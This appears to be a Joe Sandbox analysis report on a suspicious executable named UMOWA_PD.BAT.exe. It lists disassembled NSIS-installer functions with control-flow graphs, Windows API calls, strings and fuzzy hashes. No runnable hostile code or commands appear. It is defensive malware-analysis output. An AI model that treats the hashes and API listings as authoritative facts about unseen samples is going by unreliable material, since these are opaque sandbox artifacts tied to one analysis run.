                                                                                    • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                    • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE
                                                                                    Function 00401774 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 794 401774-401799 call 402dab call 405e67 799 4017a3-4017b5 call 406521 call 405df0 lstrcatW 794->799 800 40179b-4017a1 call 406521 794->800 806 4017ba-4017bb call 4067cf 799->806 800->806 809 4017c0-4017c4 806->809 810 4017c6-4017d0 call 40687e 809->810 811 4017f7-4017fa 809->811 819 4017e2-4017f4 810->819 820 4017d2-4017e0 CompareFileTime 810->820 813 401802-40181e call 406011 811->813 814 4017fc-4017fd call 405fec 811->814 821 401820-401823 813->821 822 401892-4018bb call 4055a6 call 4032b9 813->822 814->813 819->811 820->819 823 401874-40187e call 4055a6 821->823 824 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 821->824 836 4018c3-4018cf SetFileTime 822->836 837 4018bd-4018c1 822->837 834 401887-40188d 823->834 824->809 858 401869-40186a 824->858 838 402c38 834->838 840 4018d5-4018e0 CloseHandle 836->840 837->836 837->840 841 402c3a-402c3e 838->841 843 4018e6-4018e9 840->843 844 402c2f-402c32 840->844 846 4018eb-4018fc call 40655e lstrcatW 843->846 847 4018fe-401901 call 40655e 843->847 844->838 852 401906-40239d 846->852 847->852 856 4023a2-4023a7 852->856 857 40239d call 405b81 852->857 856->841 857->856 858->834 859 40186c-40186d 858->859 859->823
                                                                                    APIs
                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,00435000,?,?,00000031), ref: 004017B5
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00435000,?,?,00000031), ref: 004017DA
                                                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                      • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                      • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 00405613
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp$C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll$Call
                                                                                    • API String ID: 1941528284-2922160740
                                                                                    • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                    • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                                                    • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                    • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D
                                                                                    Function 0040687E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                    • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp$X_B
                                                                                    • API String ID: 2295610775-3215270107
                                                                                    • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                    • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                                                    • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                    • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                                                                                    Function 00406C3F Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                    • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                                                    • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                    • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                                    Function 00403FA1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 202 403fa1-403fb3 203 403fb9-403fbf 202->203 204 40411a-404129 202->204 203->204 205 403fc5-403fce 203->205 206 404178-40418d 204->206 207 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 204->207 208 403fd0-403fdd SetWindowPos 205->208 209 403fe3-403fea 205->209 211 4041cd-4041d2 call 4044ec 206->211 212 40418f-404192 206->212 207->206 208->209 214 403fec-404006 ShowWindow 209->214 215 40402e-404034 209->215 220 4041d7-4041f2 211->220 217 404194-40419f call 401389 212->217 218 4041c5-4041c7 212->218 221 404107-404115 call 404507 214->221 222 40400c-40401f GetWindowLongW 214->222 223 404036-404048 DestroyWindow 215->223 224 40404d-404050 215->224 217->218 237 4041a1-4041c0 SendMessageW 217->237 218->211 219 40446d 218->219 231 40446f-404476 219->231 228 4041f4-4041f6 call 40140b 220->228 229 4041fb-404201 220->229 221->231 222->221 230 404025-404028 ShowWindow 222->230 232 40444a-404450 223->232 234 404052-40405e SetWindowLongW 224->234 235 404063-404069 224->235 228->229 241 404207-404212 229->241 242 40442b-404444 DestroyWindow EndDialog 229->242 230->215 232->219 240 404452-404458 232->240 234->231 235->221 243 40406f-40407e GetDlgItem 235->243 237->231 240->219 244 40445a-404463 ShowWindow 240->244 241->242 245 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 241->245 242->232 246 404080-404097 SendMessageW IsWindowEnabled 243->246 247 40409d-4040a0 243->247 244->219 274 404267-40426c 245->274 275 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 245->275 246->219 246->247 248 4040a2-4040a3 247->248 249 4040a5-4040a8 247->249 251 4040d3-4040d8 call 404479 248->251 252 4040b6-4040bb 249->252 253 4040aa-4040b0 249->253 251->221 255 4040f1-404101 SendMessageW 252->255 257 4040bd-4040c3 252->257 253->255 256 4040b2-4040b4 253->256 255->221 256->251 260 4040c5-4040cb call 40140b 257->260 261 4040da-4040e3 call 40140b 257->261 272 4040d1 260->272 261->221 270 4040e5-4040ef 261->270 270->272 272->251 274->275 278 4042b0 275->278 279 4042ad-4042ae 275->279 280 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 4042e2-4042f3 SendMessageW 280->281 282 4042f5 280->282 283 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 281->283 282->283 283->220 294 404340-404342 283->294 294->220 295 404348-40434c 294->295 296 40436b-40437f DestroyWindow 295->296 297 40434e-404354 295->297 296->232 299 404385-4043b2 CreateDialogParamW 296->299 297->219 298 40435a-404360 297->298 298->220 300 404366 298->300 299->232 301 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404411-404424 ShowWindow call 4044ec 301->306 308 404429 306->308 308->232
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                    • ShowWindow.USER32(?), ref: 00403FFD
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                    • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                    • DestroyWindow.USER32 ref: 0040403C
                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                    • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                    • GetDlgItem.USER32(?,?), ref: 0040413A
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041AF
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                    • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B9
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D8
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                    • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                    • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 121052019-0
                                                                                    • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                    • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                                                    • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                    • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E
                                                                                    Function 00403BF3 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215stringregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 309 403bf3-403c0b call 406915 312 403c0d-403c1d call 406468 309->312 313 403c1f-403c56 call 4063ef 309->313 322 403c79-403ca2 call 403ec9 call 405ef8 312->322 318 403c58-403c69 call 4063ef 313->318 319 403c6e-403c74 lstrcatW 313->319 318->319 319->322 327 403d34-403d3c call 405ef8 322->327 328 403ca8-403cad 322->328 334 403d4a-403d6f LoadImageW 327->334 335 403d3e-403d45 call 40655e 327->335 328->327 329 403cb3-403ccd call 4063ef 328->329 333 403cd2-403cdb 329->333 333->327 336 403cdd-403ce1 333->336 338 403df0-403df8 call 40140b 334->338 339 403d71-403da1 RegisterClassW 334->339 335->334 340 403cf3-403cff lstrlenW 336->340 341 403ce3-403cf0 call 405e1d 336->341 352 403e02-403e0d call 403ec9 338->352 353 403dfa-403dfd 338->353 342 403da7-403deb SystemParametersInfoW CreateWindowExW 339->342 343 403ebf 339->343 347 403d01-403d0f lstrcmpiW 340->347 348 403d27-403d2f call 405df0 call 406521 340->348 341->340 342->338 346 403ec1-403ec8 343->346 347->348 351 403d11-403d1b GetFileAttributesW 347->351 348->327 356 403d21-403d22 call 405e3c 351->356 357 403d1d-403d1f 351->357 362 403e13-403e2d ShowWindow call 4068a5 352->362 363 403e96-403e97 call 405679 352->363 353->346 356->348 357->348 357->356 370 403e39-403e4b GetClassInfoW 362->370 371 403e2f-403e34 call 4068a5 362->371 367 403e9c-403e9e 363->367 368 403ea0-403ea6 367->368 369 403eb8-403eba call 40140b 367->369 368->353 372 403eac-403eb3 call 40140b 368->372 369->343 375 403e63-403e86 DialogBoxParamW call 40140b 370->375 376 403e4d-403e5d GetClassInfoW RegisterClassW 370->376 371->370 372->353 380 403e8b-403e94 call 403b43 375->380 376->375 380->346
                                                                                    APIs
                                                                                      • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                      • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                    • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,00434000,00008001), ref: 00403C74
                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76E63420), ref: 00403CF4
                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403D5B
                                                                                      • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                    • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                    • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                    • API String ID: 1975747703-3228750522
                                                                                    • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                    • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                                                    • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                    • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D
                                                                                    Function 00403082 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 402 403205-403208 396->402 403 403258-40325d 396->403 400 403130-403139 call 40349e 398->400 401 40312e 398->401 410 40325f-403267 call 40301e 400->410 411 40313f-403146 400->411 401->400 405 40320a-403222 call 4034b4 call 40349e 402->405 406 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 402->406 403->388 405->403 434 403224-40322a 405->434 406->403 432 403269-40327a 406->432 410->403 412 4031c2-4031c6 411->412 413 403148-40315c call 405fcc 411->413 420 4031d0-4031d6 412->420 421 4031c8-4031cf call 40301e 412->421 413->420 430 40315e-403165 413->430 423 4031e5-4031ed 420->423 424 4031d8-4031e2 call 406a02 420->424 421->420 423->398 431 4031f3 423->431 424->423 430->420 436 403167-40316e 430->436 431->396 437 403282-403287 432->437 438 40327c 432->438 434->403 434->406 436->420 439 403170-403177 436->439 440 403288-40328e 437->440 438->437 439->420 441 403179-403180 439->441 440->440 442 403290-4032ab SetFilePointer call 405fcc 440->442 441->420 443 403182-4031a2 441->443 446 4032b0 442->446 443->403 445 4031a8-4031ac 443->445 447 4031b4-4031bc 445->447 448 4031ae-4031b2 445->448 446->388 447->420 449 4031be-4031c0 447->449 448->431 448->447 449->420
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,00000400), ref: 004030AF
                                                                                      • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 00406015
                                                                                      • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 004030FB
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\UMOWA_PD.BAT.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-1551916588
                                                                                    • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                    • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                    • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                    • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D
                                                                                    Function 0040655E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 671 40655e-406567 672 406569-406578 671->672 673 40657a-406594 671->673 672->673 674 4067a4-4067aa 673->674 675 40659a-4065a6 673->675 677 4067b0-4067bd 674->677 678 4065b8-4065c5 674->678 675->674 676 4065ac-4065b3 675->676 676->674 680 4067c9-4067cc 677->680 681 4067bf-4067c4 call 406521 677->681 678->677 679 4065cb-4065d4 678->679 682 406791 679->682 683 4065da-40661d 679->683 681->680 685 406793-40679d 682->685 686 40679f-4067a2 682->686 687 406623-40662f 683->687 688 406735-406739 683->688 685->674 686->674 689 406631 687->689 690 406639-40663b 687->690 691 40673b-406742 688->691 692 40676d-406771 688->692 689->690 695 406675-406678 690->695 696 40663d-40665b call 4063ef 690->696 693 406752-40675e call 406521 691->693 694 406744-406750 call 406468 691->694 697 406781-40678f lstrlenW 692->697 698 406773-40677c call 40655e 692->698 710 406763-406769 693->710 694->710 703 40667a-406686 GetSystemDirectoryW 695->703 704 40668b-40668e 695->704 709 406660-406663 696->709 697->674 698->697 705 406718-40671b 703->705 706 4066a0-4066a4 704->706 707 406690-40669c GetWindowsDirectoryW 704->707 711 40672d-406733 call 4067cf 705->711 712 40671d-406720 705->712 706->705 713 4066a6-4066c4 706->713 707->706 709->712 714 406669-406670 call 40655e 709->714 710->697 715 40676b 710->715 711->697 712->711 716 406722-406728 lstrcatW 712->716 718 4066c6-4066cc 713->718 719 4066d8-4066f0 call 406915 713->719 714->705 715->711 716->711 724 4066d4-4066d6 718->724 728 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 719->728 729 406707-406710 719->729 724->719 726 406712-406716 724->726 726->705 728->726 728->729 729->713 729->726
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
